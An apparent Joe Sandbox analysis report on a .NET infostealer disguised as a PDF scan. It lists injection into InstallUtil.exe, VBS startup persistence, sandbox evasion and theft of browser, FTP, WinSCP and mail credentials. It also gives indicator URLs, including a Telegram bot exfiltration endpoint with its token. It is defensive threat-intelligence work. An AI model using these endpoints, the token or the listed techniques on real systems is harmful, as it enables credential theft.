                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe; Memory allocated: 2D00000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe; Memory allocated: 2C30000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 1470000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 2F70000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 4F70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Guid.exe; Memory allocated: 1550000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Guid.exe; Memory allocated: 2F70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\Guid.exe; Memory allocated: 2EC0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: FE0000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 2870000 memory reserve | memory write watch
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Memory allocated: 4870000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Guid.exe; Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe; Window / User API: threadDelayed 2316
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe; Window / User API: threadDelayed 7486
                      Source: C:\Users\user\AppData\Roaming\Guid.exe; Window / User API: threadDelayed 1680
                      Source: C:\Users\user\AppData\Roaming\Guid.exe; Window / User API: threadDelayed 4512
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99437s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99328s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99218s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99109s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -99000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98890s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98781s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98671s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98562s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98453s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98343s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98233s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -98014s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97901s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97687s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97497s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97386s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97250s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97140s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -97031s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -96922s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -96812s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -96703s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                      Source: wscript.exe, 00000004.00000002.2406414720.000002A3D5DE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: InstallUtil.exe, 00000002.00000002.2468447335.00000000055D2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                      Source: Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: wscript.exe, 00000004.00000002.2406414720.000002A3D5DE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2260543550.0000000000F15000.00000004.00000020.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2449757865.000000000137B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: InstallUtil.exe, 00000006.00000002.3438981636.0000000005BB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkk
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Memory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\Guid.exe "C:\Users\user\AppData\Roaming\Guid.exe"
                      Source: C:\Users\user\AppData\Roaming\Guid.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Queries volume information: C:\Users\user\Desktop\rScan_0984829339_PDF.exe VolumeInformation
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Guid.exe Queries volume information: C:\Users\user\AppData\Roaming\Guid.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Guid.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Guid.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: Yara match File source: sslproxydump.pcap, type: PCAP
                      Source: Yara match File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1472, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6708, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.Guid.exe.40bbf88.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.Guid.exe.40bbf88.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.rScan_0984829339_PDF.exe.3e96b78.3.raw.unpack, type: UNPACKEDPE

MITRE ATT&CK matrix (cell layout lost in extraction)

Tactics: Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact

Techniques shown with a count in the matrix: Scripting; Windows Management Instrumentation; DLL Side-Loading; Disable or Modify Tools; OS Credential Dumping; File and Directory Discovery; Archive Collected Data; Web Service; Scheduled Task/Job; Process Injection; Obfuscated Files or Information; Credentials in Registry; System Information Discovery; Data from Local System; Ingress Tool Transfer; Software Packing; Security Software Discovery; Email Collection; Encrypted Channel; Registry Run Keys / Startup Folder; Process Discovery; Non-Application Layer Protocol; Masquerading; Virtualization/Sandbox Evasion; Application Layer Protocol; Application Window Discovery

Technique names shown without a count: Gather Victim Identity Information; Valid Accounts; Remote Services; Exfiltration Over Other Network Medium; Abuse Accessibility Features; Credentials; Domains; Default Accounts; Remote Desktop Protocol; Exfiltration Over Bluetooth; Network Denial of Service; Email Addresses; DNS Server; Domain Accounts; At; Security Account Manager; SMB/Windows Admin Shares; Automated Exfiltration; Data Encrypted for Impact; Employee Names; Virtual Private Server; Local Accounts; Cron; NTDS; Distributed Component Object Model; Input Capture; Traffic Duplication; Data Destruction; Gather Victim Network Information; Server; Cloud Accounts; Launchd; Network Logon Script; LSA Secrets; SSH; Keylogging; Scheduled Transfer; Domain Properties; Botnet; Replication Through Removable Media; Scheduled Task; RC Scripts; Cached Domain Credentials; VNC; GUI Input Capture; Multiband Communication; Data Transfer Size Limits; Service Stop; DNS; Web Services; External Remote Services; Systemd Timers; Startup Items; DCSync; Remote System Discovery; Windows Remote Management; Web Portal Capture; Commonly Used Port; Exfiltration Over C2 Channel; Inhibit System Recovery

Behavior Graph
ID: 1534432; Sample: rScan_0984829339_PDF.exe; Startdate: 15/10/2024; Architecture: WINDOWS; Score: 100

Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 11 other signatures
Top-level DNS/IP: rubberpartsmanufacturers.com
Top-level DNS/IP: api.telegram.org (signature: Uses the Telegram API (likely for C&C communication))

• rScan_0984829339_PDF.exe (started)
  • DNS/IP: rubberpartsmanufacturers.com 103.191.208.122, 443, 49711, 49804 AARNET-AS-APAustralianAcademicandResearchNetworkAARNe unknown
  • Dropped: C:\Users\user\AppData\Roaming\Guid.exe, PE32
  • Dropped: C:\Users\user\AppData\Roaming\...\Guid.vbs, ASCII
  • Dropped: C:\Users\user\...\Guid.exe:Zone.Identifier, ASCII
  • Signature: Drops VBS files to the startup folder
  • Signature: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  • InstallUtil.exe (started)
    • DNS/IP: api.telegram.org 149.154.167.220, 443, 49739, 49831 TELEGRAMRU United Kingdom
    • Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
    • Signature: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
    • Signature: Tries to steal Mail credentials (via file / registry access)
• wscript.exe (started)
  • Signature: Windows Scripting host queries suspicious COM object (likely to drop second stage)
  • Guid.exe (started)
    • Signature: Multi AV Scanner detection for dropped file
    • Signature: Machine Learning detection for dropped file
    • InstallUtil.exe (started)
      • Signature: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
      • Signature: Tries to steal Mail credentials (via file / registry access)
      • Signature: Tries to harvest and steal ftp login credentials
      • Signature: Tries to harvest and steal browser information (history, passwords, etc)

Source | Detection | Scanner | Label
rScan_0984829339_PDF.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
rScan_0984829339_PDF.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Roaming\Guid.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Guid.exe | 32% | ReversingLabs | ByteCode-MSIL.Trojan.Generic

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe
https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
rubberpartsmanufacturers.com | 103.191.208.122 | true | false | | unknown
api.telegram.org | 149.154.167.220 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/sendDocument | true | | unknown
https://rubberpartsmanufacturers.com/hunziq/Sgtuwurbrz.mp3 | false | | unknown

Name | Source (process) | Malicious | Antivirus Detection | Reputation
https://github.com/mgravell/protobuf-neti | rScan_0984829339_PDF.exe, Guid.exe | false | | unknown
https://stackoverflow.com/q/14436606/23354 | rScan_0984829339_PDF.exe, Guid.exe | false | URL Reputation: safe | unknown
https://account.dyn.com/ | rScan_0984829339_PDF.exe, InstallUtil.exe, Guid.exe | false | URL Reputation: safe | unknown
https://api.telegram.org | InstallUtil.exe | true | | unknown
https://github.com/mgravell/protobuf-netJ | rScan_0984829339_PDF.exe, Guid.exe | false | | unknown
https://api.telegram.org/bot7162202130:AAHTxdkbyFCUMWCzyf9jutDYYrL6rqEAva4/ | rScan_0984829339_PDF.exe, InstallUtil.exe, Guid.exe | true | | unknown
https://stackoverflow.com/q/11564914/23354; | rScan_0984829339_PDF.exe, Guid.exe | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/2152978/23354 | rScan_0984829339_PDF.exe, Guid.exe | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-net | rScan_0984829339_PDF.exe, Guid.exe | false | | unknown
http://api.telegram.org | InstallUtil.exe | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | rScan_0984829339_PDF.exe, InstallUtil.exe, Guid.exe | false | URL Reputation: safe | unknown
https://rubberpartsmanufacturers.com | rScan_0984829339_PDF.exe, Guid.exe | false | | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
103.191.208.122 | rubberpartsmanufacturers.com | unknown | 7575 | AARNET-AS-APAustralianAcademicandResearchNetworkAARNe | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1534432
Start date and time: 2024-10-15 21:31:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 7s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: rScan_0984829339_PDF.exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@8/3@2/2
                                            EGA Information:
                                            • Successful, ratio: 50%
                                            HCA Information:
                                            • Successful, ratio: 92%
                                            • Number of executed functions: 264
                                            • Number of non-executed functions: 7
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target Guid.exe, PID 5588 because it is empty
                                            • Execution Graph export aborted for target rScan_0984829339_PDF.exe, PID 6272 because it is empty
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                            • VT rate limit hit for: rScan_0984829339_PDF.exe

Time | Type | Description
15:31:59 | API Interceptor | 69x Sleep call for process: rScan_0984829339_PDF.exe modified
15:32:24 | API Interceptor | 30x Sleep call for process: Guid.exe modified
21:32:14 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Guid.vbs

Match | Associated Sample Name / URL | Detection | Threat Name
149.154.167.220 | na.doc | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | z95ReviseInvoice_USD_.exe | malicious | MassLogger RAT
149.154.167.220 | Qaovmgmn.exe | malicious | Snake Keylogger
149.154.167.220 | cyCsE47YV3.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | na.doc | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | RFQ_56783295_12538_15.10.2024.vbs | malicious | GuLoader, Snake Keylogger
149.154.167.220 | INQ-PORT_9290029992-pdf.vbs | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | Scan-Purchase Order3550..docx.doc | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | RFQ-2413AM-KE2800.scr.exe | malicious | Snake Keylogger, VIP Keylogger
149.154.167.220 | PO-10-15-2024.exe | malicious | Snake Keylogger, VIP Keylogger
103.191.208.122 | Request for Quotation-537262227-04.exe | malicious | AgentTesla
103.191.208.122 | AYV0eq1Gyc.exe | malicious | AgentTesla
103.191.208.122 | GEFA-Order 232343-68983689.exe | malicious | AgentTesla
103.191.208.122 | GEFA-Order 232343-68983689.exe | malicious | AgentTesla
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        api.telegram.orgna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        z95ReviseInvoice_USD_.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        Qaovmgmn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        RFQ_56783295_12538_15.10.2024.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        INQ-PORT_9290029992-pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        RFQ-2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        rubberpartsmanufacturers.comRequest for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 103.191.208.122
                                                                        AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 103.191.208.122
                                                                        GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 103.191.208.122
                                                                        GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 103.191.208.122
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        TELEGRAMRUna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        z95ReviseInvoice_USD_.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        Qaovmgmn.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        RFQ_56783295_12538_15.10.2024.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        INQ-PORT_9290029992-pdf.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        Scan-Purchase Order3550..docx.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        RFQ-2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        PO-10-15-2024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        • 149.154.167.220
                                                                        AARNET-AS-APAustralianAcademicandResearchNetworkAARNeSecuriteInfo.com.FileRepMalware.14694.23524.exeGet hashmaliciousUnknownBrowse
                                                                        • 103.167.234.130
                                                                        Quote.exeGet hashmaliciousRemcosBrowse
                                                                        • 103.186.117.77
                                                                        na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.136.131.127
                                                                        na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.177.149.59
                                                                        na.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 157.85.109.76
                                                                        4Y8rbNhkaR.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 103.128.231.194
                                                                        arm.nn-20241014-0317.elfGet hashmaliciousMirai, OkiruBrowse
                                                                        • 103.162.50.15
                                                                        mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 103.187.127.142
                                                                        sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                        • 157.85.109.79
                                                                        jYEvdBHMOI.elfGet hashmaliciousMiraiBrowse
                                                                        • 103.170.60.254
                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        3b5074b1b5d032e5620f69f9f700ff0ehttps://forms.zohopublic.com/pharmops1/form/DOCUSIGNREVIEW/formperma/hzyn6gH_uB4k6Kv8lque19zZem5KI3as5uJYGnlnfacGet hashmaliciousHTMLPhisherBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        z95ReviseInvoice_USD_.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        https://whimsical.com/maryland-deli-provisions-BvzVjYjzBeaob2dyDXoWU7Get hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        Play.VN-_E_CQDM.htmlGet hashmaliciousUnknownBrowse
                                                                        • 149.154.167.220
                                                                        • 103.191.208.122
                                                                        Contract-476939299.pdfGet hashmaliciousUnknownBrowse
